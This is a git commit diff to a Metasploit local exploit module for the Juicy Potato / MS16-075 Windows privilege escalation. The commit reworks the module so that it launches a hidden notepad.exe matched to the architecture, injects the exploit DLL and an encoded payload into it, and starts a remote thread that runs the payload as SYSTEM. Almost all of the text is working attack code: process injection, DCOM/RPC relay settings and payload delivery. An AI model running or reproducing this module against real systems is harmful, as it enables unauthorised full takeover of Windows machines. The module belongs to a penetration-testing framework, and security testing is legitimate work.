feat: spawn as NT AUTHORITY\SYSTEM

2019-01-12 04:03:26 +01:00 · 2019-01-12 04:03:26 +01:00 · 3a865a0c05
parent 9789547fe7
commit 3a865a0c05
1 changed files with 53 additions and 38 deletions
--- a/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
+++ b/modules/exploits/windows/local/ms16_075_reflection_juicy.rb
@ -30,7 +30,8 @@ class MetasploitModule < Msf::Exploit::Local
          'breenmachine', # Rotten Potato NG!
          'decoder', # Lonely / Juicy Potato
          'ohpe', # Juicy Potato
-          'phra' # MSF Module
+          'phra', # MSF Module
+          'lupman' # MSF Module
        ],
      'Arch'           => [ARCH_X86, ARCH_X64],
      'Platform'       => 'win',
@ -38,14 +39,13 @@ class MetasploitModule < Msf::Exploit::Local
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'none',
-          'WfsDelay' => '0',
-          'DisablePayloadHandler' => 'true'
+          'WfsDelay' => '20'
        },
      'Targets'        =>
        [
-          ['Automatic', {}],
-          ['Windows x86', { 'Arch' => ARCH_X86 }],
-          ['Windows x64', { 'Arch' => ARCH_X64 }]
+          ['Automatic', {}]
+          #['Windows x86', { 'Arch' => ARCH_X86 }],
+          #['Windows x64', { 'Arch' => ARCH_X64 }]
        ],
      'Payload'         =>
        {
@ -67,16 +67,16 @@ class MetasploitModule < Msf::Exploit::Local

    register_options(
      [
-        OptString.new('CLSID', [ true, 'Set CLSID value of the DCOM to trigger', '{4991d34b-80a1-4291-83b6-3328366b9097}' ]),
-        OptPort.new('DCOM_PORT', [ true, 'Set listening port for MITM DCOM communication', 6666 ])
+        OptString.new('CLSID', [ true, 'Set CLSID value of the DCOM to trigger', '{4991d34b-80a1-4291-83b6-3328366b9097}' ])
      ])

    register_advanced_options(
      [
-        OptAddress.new('RPC_IP', [ true, 'Set RPC_IP value', '127.0.0.1' ]),
-        OptPort.new('RPC_PORT', [ true, 'Set RPC_PORT value', 135 ]),
-        OptAddress.new('DCOM_IP', [ true, 'Set DCOM_IP value', '127.0.0.1' ]),
-        OptString.new('LOGFILE', [ false, 'Set the log file' ]),
+        OptAddress.new('RpcServerHost', [ true, 'Set RPC server target host', '127.0.0.1' ]),
+        OptPort.new('RpcServerPort', [ true, 'Set RPC server target port', 135 ]),
+        OptAddress.new('ListeningAddress', [ true, 'Set listening address for MITM DCOM communication', '127.0.0.1' ]),
+        OptPort.new('ListeningPort', [ true, 'Set listening port for MITM DCOM communication', 7777 ]),
+        OptString.new('LogFile', [ false, 'Set the log file' ])
      ])
  end

@ -98,17 +98,35 @@ class MetasploitModule < Msf::Exploit::Local
    return my_target
  end

-  def verify_arch(my_target)
-    if my_target["Arch"] != sysinfo["Architecture"]
-      print_error("Assigned Target Arch = #{my_target.opts['Arch']}")
-      print_error("Actual Target Arch = #{sysinfo['Architecture']}")
-      fail_with(Failure::BadConfig, "Assigned Arch does not match reality")
-    end
-    if client.arch != sysinfo["Architecture"]
-      fail_with(Failure::BadConfig, "Session/Target Arch mismatch; WOW64 not supported")
+  # Creates a temp notepad.exe to inject payload in to given the payload
+  def create_temp_proc()
+    windir = client.sys.config.getenv('windir')
+    # Select path of executable to run depending the architecture
+    if sysinfo["Architecture"] == ARCH_X64 and client.arch == ARCH_X86 and @payload_arch.first == ARCH_X64
+      cmd = "#{windir}\\Sysnative\\notepad.exe"
+    elsif sysinfo["Architecture"] == ARCH_X64 and client.arch == ARCH_X64 and @payload_arch.first == ARCH_X86
+      cmd = "#{windir}\\SysWOW64\\notepad.exe"
    else
-      vprint_good("Current payload and target Arch match....")
+      cmd = "#{windir}\\System32\\notepad.exe"
    end
+    begin
+      proc = client.sys.process.execute(cmd, nil, {'Hidden' => true})
+    rescue Rex::Post::Meterpreter::RequestError
+      return nil
+    end
+
+    return proc
+  end
+
+  def create_temp_proc_stage2()
+    windir = client.sys.config.getenv('windir')
+    # Select path of executable to run depending the architecture
+    if sysinfo["Architecture"] == ARCH_X64 and @payload_arch.first == ARCH_X86
+      cmd = "#{windir}\\SysWOW64\\notepad.exe"
+    else
+      cmd = "#{windir}\\System32\\notepad.exe"
+    end
+    return cmd
  end

  def check
@ -124,9 +142,6 @@ class MetasploitModule < Msf::Exploit::Local
    if privs.include?('SeImpersonatePrivilege')
      return Exploit::CheckCode::Appears
    end
-    if privs.include?('SeAssignPrimaryToken')
-      return Exploit::CheckCode::Appears
-    end
    return Exploit::CheckCode::Safe
  end

@ -134,24 +149,24 @@ class MetasploitModule < Msf::Exploit::Local
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end
+    @payload_name = datastore['PAYLOAD']
+    @payload_arch = framework.payloads.create(@payload_name).arch
    my_target = assign_target
-    print_status("#{my_target['Arch']}")
-    verify_arch(my_target)
    if check == Exploit::CheckCode::Safe
-      fail_with(Failure::NoAccess, 'User does not have SeImpersonate or SeAssignPrimaryToken Privilege or Windows version not supported')
+      fail_with(Failure::NoAccess, 'User does not have SeImpersonate or SeAssignPrimaryToken Privilege')
    end
-    if my_target.opts['Arch'] == 'x64'
+    if @payload_arch.first == ARCH_X64
      dll_file_name = 'juicypotato.x64.dll'
      vprint_status("Assigning payload juicypotato.x64.dll")
-    elsif my_target.opts['Arch'] == 'x86'
+    elsif @payload_arch.first == ARCH_X86
      dll_file_name = 'juicypotato.x86.dll'
      vprint_status("Assigning payload juicypotato.x86.dll")
    else
      fail_with(Failure::BadConfig, "Unknown target arch; unable to assign exploit code")
    end
    print_status('Launching notepad to host the exploit...')
-    notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)
-    #notepad_process = client.sys.process.execute('cmd.exe', nil, 'Hidden' => true)
+    notepad_process = create_temp_proc
+    cmd = create_temp_proc_stage2
    begin
      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
      print_good("Process #{process.pid} launched.")
@ -165,13 +180,13 @@ class MetasploitModule < Msf::Exploit::Local
    print_status("Injecting exploit into #{process.pid}...")
    exploit_mem, offset = inject_dll_into_process(process, library_path)
    print_status("Exploit injected. Injecting exploit configuration into #{process.pid}...")
-    #payload_mem = inject_into_process(process, payload.encoded)
-    configuration = "#{datastore['LOGFILE']}\x00"
+    configuration = "#{datastore['LogFile']}\x00"
+    configuration += "#{cmd}\x00"
    configuration += "#{datastore['CLSID']}\x00"
-    configuration += "#{datastore['DCOM_PORT']}\x00"
-    configuration += "#{datastore['RPC_IP']}\x00"
-    configuration += "#{datastore['RPC_PORT']}\x00"
-    configuration += "#{datastore['DCOM_IP']}\x00"
+    configuration += "#{datastore['ListeningPort']}\x00"
+    configuration += "#{datastore['RpcServerHost']}\x00"
+    configuration += "#{datastore['RpcServerPort']}\x00"
+    configuration += "#{datastore['ListeningAddress']}\x00"
    configuration += "#{payload.encoded.length}\x00"
    configuration += payload.encoded
    payload_mem = inject_into_process(process, configuration)
@ -179,6 +194,6 @@ class MetasploitModule < Msf::Exploit::Local
    # we want invoked on successful exploitation.
    print_status('Configuration injected. Executing exploit...')
    process.thread.create(exploit_mem + offset, payload_mem)
-    print_good('Exploit finished, check incognito module.')
+    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
  end
 end